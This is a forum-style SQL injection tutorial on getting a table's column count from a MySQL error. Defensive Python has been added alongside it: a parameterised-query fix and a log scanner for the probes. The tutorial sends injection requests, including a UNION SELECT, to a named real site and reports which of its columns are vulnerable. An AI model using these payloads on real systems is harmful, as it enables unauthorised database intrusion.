Thursday, 14 May 2015

[SQLI TRICK] find column count in one request [TUT]

First, some explanation.
Up to now we found the column count with GROUP BY / ORDER BY,
like this:

Code:
http://www.marinaplast.com/page.php?id=13 group by 6
error 1054
Quote:(Unknown column '6' in 'group statement')

Code:
http://www.marinaplast.com/page.php?id=13 group by 5
No error.
Why does that happen?
Behind the URL /page.php?id=13 there is a SQL query:

PHP Code:
SELECT * FROM pages WHERE id=13 

/** if you don't know what that means, it's time to learn SQL:
http://www.w3schools.com/sql/default.asp **/
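The post says the id from the URL ends up inside that SELECT. As an added example (not code from the post or from the site it mentions), here is the shape of such a page handler, with the id pasted into the SQL text, next to the hardened form that validates the type and binds it as a parameter. The `pages` table is a constructed in-memory stand-in built from the post's five-column example, and the probe string is the one the post uses; the point is that the unsafe handler turns the probe into a database error (which a careless page would echo), while the safe handler rejects it before any SQL is built.

```python
import sqlite3

# Constructed in-memory stand-in for the post's `pages` table: five columns,
# matching the example SELECT id,title,price,pic,type. Not the real site's schema.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (id INTEGER, title TEXT, price REAL, pic TEXT, type TEXT)")
    db.execute("INSERT INTO pages VALUES (13, 'About', 0.0, 'about.jpg', 'static')")
    return db

def lookup_unsafe(db, raw_id):
    """The pattern the post describes: the id parameter is concatenated into the
    SQL string, so the parameter can carry extra SQL.
    Returns (rows, error_text); error_text is what a careless page would echo."""
    sql = "SELECT * FROM pages WHERE id=" + raw_id
    try:
        return db.execute(sql).fetchall(), None
    except sqlite3.Error as e:
        return [], str(e)

def lookup_safe(db, raw_id):
    """Hardened form: validate the type first, then bind the value as a parameter.
    The database never sees the input as SQL text, and no DB error is produced
    by odd input because odd input never reaches the query."""
    page_id = int(raw_id)  # raises ValueError for anything that is not an integer
    return db.execute("SELECT * FROM pages WHERE id=?", (page_id,)).fetchall()

# The post's one-request column-count probe, appended to a valid id.
PROBE = "13 and (select * from pages)=(select 1)"

if __name__ == "__main__":
    db = make_db()
    rows, err = lookup_unsafe(db, PROBE)
    print("unsafe handler -> rows:", rows, "| error text a page might echo:", err)
    try:
        print("safe handler ->", lookup_safe(db, PROBE))
    except ValueError as e:
        print("safe handler -> input rejected before any SQL was built:", e)
```

SQLite is used here only because it ships with Python; the error text differs from MySQL's 1241 message, but the lesson is the same: with concatenation the probe reaches the database and the error leaks structure, with validation plus parameter binding it never gets that far.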

The UNION SELECT has to return the same number of columns as the original SELECT on that table.
http://www.w3schools.com/sql/sql_union.asp
For example, if the query is like this:

PHP Code:
SELECT id,title,price,pic,type FROM pages WHERE id=13 
then the UNION will look like:
PHP Code:
SELECT id,title,price,pic,type FROM pages WHERE id=13 UNION SELECT 1,2,3,4,5 
because there are 5 columns in the table pages, which is the table we are in now.

Now that we understand that, let's move on.
We know the query behind our URL is:

PHP Code:
SELECT * FROM pages WHERE id=13 
but we don't know how many columns * stands for (it means select all the columns in the table).
So let's count *:

Code:
http://www.marinaplast.com/page.php?id=13 and (select * from pages)=(select 1)
We add a condition: and (the main query)=(select 1).
But we never said how many columns the main query has, while the right side has exactly one!
So the database complains about the mismatch, and the error message tells us the number of columns in the table.

Code:
http://www.marinaplast.com/page.php?id=13 and (select * from pages)=(select 1)
error 1241
Quote:(Operand should contain 5 column(s))
It means 5 columns.
Code:
http://www.marinaplast.com/page.php?id=13 div 0 union select 1,2,3,4,5
Columns 2 & 3 are vulnerable.
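Everything above depends on the site echoing raw database errors, and the requests leave a recognisable trail. As an added example (not part of the post), here is a small log scanner that flags the three request shapes the post walks through: GROUP BY / ORDER BY number probing, the one-request column-count probe, and the UNION SELECT that follows. The access-log lines and client addresses are constructed, and the log format is an assumed simplified one (client, request line, status); the regular expressions run on the URL-decoded query string so `+` and `%3D` encoding does not hide the probe.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not real traffic). Assumed format:
# client_ip "METHOD path HTTP/x.y" status
SAMPLE_LOG = """\
203.0.113.7 "GET /page.php?id=13 HTTP/1.1" 200
203.0.113.7 "GET /page.php?id=13+group+by+6 HTTP/1.1" 200
203.0.113.7 "GET /page.php?id=13+and+(select+*+from+pages)%3D(select+1) HTTP/1.1" 200
203.0.113.7 "GET /page.php?id=13+div+0+union+select+1,2,3,4,5 HTTP/1.1" 200
198.51.100.4 "GET /page.php?id=14 HTTP/1.1" 200
198.51.100.4 "GET /search.php?q=group+tickets HTTP/1.1" 200
"""

# The request shapes used in the post. Names are labels chosen for this example.
PROBE_PATTERNS = {
    "group_order_probe": re.compile(r"\b(group|order)\s+by\s+\d+\b", re.I),
    "column_count_probe": re.compile(
        r"\(\s*select\s+\*\s+from\s+\w+\s*\)\s*=\s*\(\s*select\b", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
}

LINE_RE = re.compile(r'^(\S+) "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def classify_request(path):
    """Return the names of the probe patterns that match the decoded query string."""
    if "?" not in path:
        return []
    query = unquote_plus(path.split("?", 1)[1])
    return [name for name, rx in PROBE_PATTERNS.items() if rx.search(query)]

def scan_log(text):
    """Return (client, path, [pattern names]) for every log line that matches a probe."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line; a real deployment would count these too
        client, path, _status = m.groups()
        names = classify_request(path)
        if names:
            hits.append((client, path, names))
    return hits

def probes_per_client(text):
    """Count flagged requests per client, the number you would alert on."""
    return Counter(client for client, _, _ in scan_log(text))

if __name__ == "__main__":
    for client, path, names in scan_log(SAMPLE_LOG):
        print(client, path, names)
    print(probes_per_client(SAMPLE_LOG))
```

The ordinary `group tickets` search is not flagged because the GROUP BY pattern requires a trailing number; in practice you would pair a rule like this with a fix at the source (parameterised queries and generic error pages), since the scanner only tells you someone is probing, not that the page is safe.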

Hope you learned something.

Author ::: BEnZI

